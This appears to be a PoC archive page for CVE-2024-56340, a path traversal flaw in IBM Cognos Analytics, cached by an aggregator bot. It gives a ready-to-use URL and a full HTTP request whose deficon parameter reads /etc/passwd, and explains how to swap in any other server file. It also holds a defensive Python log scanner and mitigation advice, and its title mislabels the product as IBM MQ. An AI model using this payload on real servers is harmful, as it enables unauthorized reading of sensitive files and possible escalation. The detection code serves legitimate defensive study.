POC details: 54eef242e97271e7fb8924654a393542758511d3

Source
Related vulnerability
Title: IBM MQ Path Traversal Vulnerability (CVE-2024-56340)
Description: IBM Cognos Analytics 11.2.0 through 11.2.4 FP5 contains a local file inclusion vulnerability; an attacker can access sensitive files by inserting a path traversal payload into the deficon parameter.
Description
IBM Cognos Analytics Path Traversal, PoC of CVE-2024-56340
Introduction
# CVE-2024-56340

**Severity :** **Medium** (**6.5**)

**CVSS score :** `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N` 

## Summary :
**IBM Cognos Analytics 11.2.0** through **11.2.4 FP5** could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system.
## Poc
After logging into IBM Cognos Analytics, a user whose grants allow reaching the URL below can read files stored server-side using path traversal payloads; in this case Unix-style payloads have been used to read /etc/passwd.
### Steps to Reproduce :
1. Login into the app.
2. Open this URL with the vulnerable **domain** substituted to read /etc/passwd, or replace %2fetc%2fpasswd with the URL-encoded path (/ encoded as %2f) of the file to read:
```
https://<domain>/ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&v=3
```
Full request:
```
GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&v=3 HTTP/1.1
Host: <host>
Cookie: <cookie> 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
```
NOTE: Other files can be read through the same traversal by placing the URL-encoded path of the file in place of `%2fetc%2fpasswd`.
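As an added example from the defender's side (it is not part of the PoC above and not code from IBM's product), the following Python script scans web-server access-log lines for the `deficon` parameter and flags any value that, once percent-encoding is fully stripped, resolves outside its base directory. The parameter name and endpoint path come from the request shown above; the log lines themselves are constructed for this example. It goes beyond the single payload on the page by also catching double-encoded (`%252e%252e%252f`) values, backslash separators and `dir/../..` forms that do not start with `..`.

```python
from __future__ import annotations

import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (Combined Log Format). IPs, timestamps
# and the benign icon name are made up; the endpoint and the deficon parameter
# are the ones named in the PoC request.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2025:12:00:01 +0000] "GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&v=3 HTTP/1.1" 200 1834
10.0.0.7 - - [10/Mar/2025:12:00:02 +0000] "GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=report.png&v=3 HTTP/1.1" 200 4096
10.0.0.9 - - [10/Mar/2025:12:00:03 +0000] "GET /ibmcognos/bi/v1/disp/icd/feeds/cm/system/rds/thumbnail/?waitThreshold=0&deficon=%252e%252e%252f%252e%252e%252fetc%252fpasswd&v=3 HTTP/1.1" 403 0
10.0.0.11 - - [10/Mar/2025:12:00:04 +0000] "GET /ibmcognos/bi/v1/disp/ HTTP/1.1" 200 512
"""

# Request line inside a Combined Log Format record: "METHOD target HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

MAX_DECODE_ROUNDS = 3  # bound repeated decoding so a crafted value cannot loop


def fully_decode(value: str) -> str:
    """Percent-decode until the value stops changing (defeats %252f-style evasion)."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value: str) -> bool:
    """True if the decoded value escapes its base directory.

    Backslashes are folded to slashes because Windows hosts accept both, and
    the path is normalised so that 'icons/../../x' is caught even though it
    does not begin with '..'.
    """
    decoded = fully_decode(value).replace("\\", "/")
    if decoded.startswith("/"):
        return True  # absolute path, never a legitimate relative icon name
    normalised = posixpath.normpath(decoded)
    return normalised == ".." or normalised.startswith("../")


def scan_log(text: str) -> list[dict]:
    """Return one finding per request whose deficon parameter looks like traversal."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        # parse_qs already strips one layer of percent-encoding; is_traversal
        # removes any remaining layers before judging the path.
        for value in parse_qs(parts.query, keep_blank_values=True).get("deficon", []):
            if is_traversal(value):
                findings.append(
                    {
                        "client": line.split()[0],
                        "path": parts.path,
                        "deficon": value,
                        "decoded": fully_decode(value),
                    }
                )
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['client']} -> {finding['path']} deficon={finding['decoded']!r}")
```

The check deliberately keys on the decoded shape of the value rather than on the literal `..%2f` string, so a WAF bypass that swaps separators or stacks encodings still produces a finding; the response status is not used, because the PoC shows that a successful read returns 200 and looks like any other thumbnail fetch.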

## Affected Version Details :

 - 11.2.0 $\le$ version $\le$ 11.2.4 (through 11.2.4 FP5)

## Impact :

An attacker can read files stored server-side on the host where the product is installed. If certain conditions hold on the victim machine, this can be a vector to RCE.
## Mitigation :

- Update to version > 11.2.4

## References :
- https://nvd.nist.gov/vuln/detail/CVE-2024-56340
File snapshot

[4.0K] /data/pocs/54eef242e97271e7fb8924654a393542758511d3 └── [2.1K] README.md 0 directories, 1 file
Cached for you by the Shenlong bot
Notes
    1. It is recommended to access the PoC through the source link first.
    2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.